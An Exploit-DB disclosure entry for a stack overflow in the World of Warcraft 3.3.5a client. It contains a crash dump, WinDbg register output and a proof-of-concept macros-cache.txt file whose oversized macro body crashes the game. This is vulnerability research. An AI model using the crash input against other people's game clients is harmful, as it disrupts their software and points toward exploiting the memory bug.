exploit-db-mirror/exploits/windows/dos/34129.txt

# Exploit Title: World Of Warcraft 3.3.5a Stack Overflow (macros-cache.txt)
# Date: 21 Jul 2014
# Exploit Author: Alireza Chegini (@nimaarek)
# Vendor Homepage: http://us.battle.net/wow/
# Version: 3.3.5a
# Tested on: Win7

Output:

--WoWError [CrashDUmp] :
World of WarCraft (build 12340)

Exe:      D:\Wow\Wow.exe
Time:     Jul 21, 2014  6:10:08.243 PM
User:     nimaarek
Computer: NIMAAREK-L
------------------------------------------------------------------------------

This application has encountered a critical error:

ERROR #132 (0x85100084) Fatal Exception
Program:	D:\Wow\Wow.exe
Exception:	0xC00000FD (STACK_OVERFLOW) at 0023:0040BB77

--Windbg result:
0:020> g
ModLoad: 6c670000 6c6a0000   C:\Windows\SysWOW64\wdmaud.drv
ModLoad: 6d3a0000 6d3a4000   C:\Windows\SysWOW64\ksuser.dll
ModLoad: 6c660000 6c667000   C:\Windows\SysWOW64\AVRT.dll
ModLoad: 6c610000 6c618000   C:\Windows\SysWOW64\msacm32.drv
ModLoad: 6c600000 6c607000   C:\Windows\SysWOW64\midimap.dll
ModLoad: 71e50000 71e66000   C:\Windows\SysWOW64\CRYPTSP.dll
ModLoad: 71e10000 71e4b000   C:\Windows\SysWOW64\rsaenh.dll
(3a8.470): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Wow.exe -
eax=02af2000 ebx=050c1f6e ecx=00000000 edx=00000000 esi=17b28f50 edi=00000000
eip=0040bb77 esp=032eed00 ebp=032ef92c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
Wow+0xbb77:
0040bb77 8500            test    dword ptr [eax],eax  ds:002b:02af2000=00000000
==============================================================================
Poc :
%systemroot%\Wow\WTF\Account\[AccountName]\macros-cache.txt

MACRO 1 "Decursive" INV_Misc_QuestionMark
/stopcasting
/cast [target=mouseover,nomod,exists] Dispel Magic;  [target=mouseover,exists,mod:ctrl] Abolish Disease; [target=mouseover,exists,mod:shift] Dispel Magic
END
MACRO 2 "PoC" INV_Misc_QuestionMark
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA x n+1 :-)
END
==============================================================================
Greetz to My Friend : promoh3nv , AmirHosein Nemati , b3hz4d And Head Administrator of ST-Team [RadoN]